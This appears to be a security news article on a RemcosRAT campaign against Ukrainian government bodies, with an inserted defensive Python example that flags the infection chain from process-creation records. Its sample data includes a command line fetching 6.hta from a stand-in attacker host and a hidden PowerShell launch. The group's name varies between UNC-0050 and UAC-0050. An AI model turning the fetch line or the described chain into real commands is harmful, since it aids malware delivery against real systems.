Threat Group Using Rare Data Transfer Tactic in New RemcosRAT Campaign

Published: 23/11/2024   Category: security



UNC-0050 is targeting government agencies in Ukraine in what appears to be a politically motivated intelligence-gathering operation.



A threat actor known for repeatedly targeting organizations in Ukraine with the RemcosRAT remote surveillance and control tool is back at it again, this time with a new tactic for transferring data without triggering endpoint detection and response (EDR) systems.
The adversary, tracked as UNC-0050, is focused on Ukrainian government entities in its latest campaign. Researchers at Uptycs who spotted it said the attacks may be politically motivated, with the goal of collecting specific intelligence from Ukrainian government agencies. While the possibility of state sponsorship remains speculative, the group's activities pose an undeniable risk, especially to government sectors reliant on Windows systems, Uptycs researchers Karthickkumar Kathiresan and Shilpesh Trivedi wrote in a report this week.
Threat actors have been using RemcosRAT — which started life as a legitimate remote administration tool — to control compromised systems since at least 2016. Among other things, the tool allows attackers to gather and exfiltrate system, user, and processor information. It can bypass many antivirus and endpoint threat detection tools and execute a variety of backdoor commands. In many instances threat actors have distributed the malware as attachments to phishing emails.
Uptycs has not been able to determine the initial attack vector in the latest campaign just yet, but said it is leaning toward job-themed phishing and spam emails as the most likely malware distribution method. The security vendor based its assessment on emails it reviewed that purported to offer targeted Ukrainian military personnel consultancy roles at Israel's Defense Forces.
The infection chain itself begins with a .lnk file that gathers information about the compromised system and then retrieves an HTML app named 6.hta from an attacker-controlled remote server using a Windows native binary, Uptycs said. The retrieved app contains a PowerShell script that initiates steps to download two other payload files (word_update.exe and ofer.docx) from an attacker-controlled domain and — ultimately — to install RemcosRAT on the system.
What makes UNC-0050's new campaign different is the threat actor's use of a Windows interprocess communications feature called anonymous pipes to transfer data on compromised systems. As Microsoft describes it, an anonymous pipe is a one-way communications channel for transferring data between a parent and a child process. UNC-0050 is taking advantage of the feature to covertly channel data without triggering any EDR or antivirus alerts, Kathiresan and Trivedi said.
UNC-0050 is not the first threat actor to use pipes to move stolen data, but the tactic remains relatively rare, the Uptycs researchers noted. Although not entirely new, this technique marks a significant leap in the sophistication of the group's strategies, they said.
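The infection chain described above, turned into a detection example (added here; not code from the Uptycs report). Data handed from a parent to a child over an anonymous pipe never touches disk or the network, so the durable signal for a defender is the process lineage the pipe itself requires; this reconstructs that lineage from process-creation records and flags the 6.hta, PowerShell, word_update.exe sequence. The event records, PIDs, paths, the attacker host and the native binary that fetched 6.hta are constructed placeholders.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # image path as a process-creation event would log it
    cmdline: str

# Stages of the chain the article describes, in the order they must appear along
# one ancestry line. Each predicate is applied to a single process event.
STAGES = [
    ("hta fetched from remote host", lambda e: re.search(r"https?://\S+\.hta\b", e.cmdline, re.I)),
    ("powershell stage", lambda e: e.image.lower().endswith("powershell.exe")),
    ("dropped payload executed", lambda e: e.image.lower().endswith("word_update.exe")),
]

def ancestry(by_pid, pid):
    """Walk parent links from pid to the root; returns root-first order, cycle-safe."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain[::-1]

def matched_stages(chain):
    """Stage labels hit in order; empty unless every stage matched."""
    labels = []
    for ev in chain:
        if len(labels) < len(STAGES) and STAGES[len(labels)][1](ev):
            labels.append(STAGES[len(labels)][0])
    return labels if len(labels) == len(STAGES) else []

def flag_chains(events):
    """[(pid, stage labels)] for every process whose ancestry shows the full chain."""
    by_pid = {e.pid: e for e in events}
    return [(e.pid, m) for e in events if (m := matched_stages(ancestry(by_pid, e.pid)))]
# Constructed sample telemetry: PIDs, user and host are illustrative, and the
# native binary that fetched 6.hta is a placeholder since the report does not name it.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(512, 400, r"C:\Windows\System32\NATIVE_BINARY_PLACEHOLDER.exe",
              "NATIVE_BINARY_PLACEHOLDER.exe http://attacker.example/6.hta"),
    ProcEvent(640, 512, PS, "powershell.exe -w hidden -c <script carried in 6.hta>"),
    ProcEvent(700, 640, r"C:\Users\u\AppData\Local\Temp\word_update.exe", "word_update.exe"),
    ProcEvent(800, 400, PS, "powershell.exe -c Get-Process"),  # benign use of the same image
]
```

Only the process whose ancestry contains all three stages is reported; the standalone PowerShell launch under explorer.exe is not.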
This is far from the first time that security researchers have spotted UAC-0050 attempting to distribute RemcosRAT to targets in Ukraine. On multiple occasions last year, Ukraine's Computer Emergency Response Team (CERT-UA) warned of campaigns by the threat actor to distribute the remote access Trojan to organizations in the country.
The most recent was an advisory on Dec. 21, 2023, about a mass phishing campaign involving emails with an attachment that purported to be a contract involving Kyivstar, one of Ukraine's largest telecommunications providers. Earlier in December, CERT-UA warned of another RemcosRAT mass distribution campaign, this one involving emails purporting to be about judicial claims and debts, targeting organizations and individuals in Ukraine and Poland. The emails contained an attachment in the form of an archive file or RAR file.
CERT-UA issued similar alerts on three other occasions last year: one in November with court subpoena-themed emails serving as the initial delivery vehicle; another, also in November, with emails allegedly from Ukraine's security service; and the first in February 2023 about a mass email campaign with attachments that appeared to be associated with a district court in Kyiv.
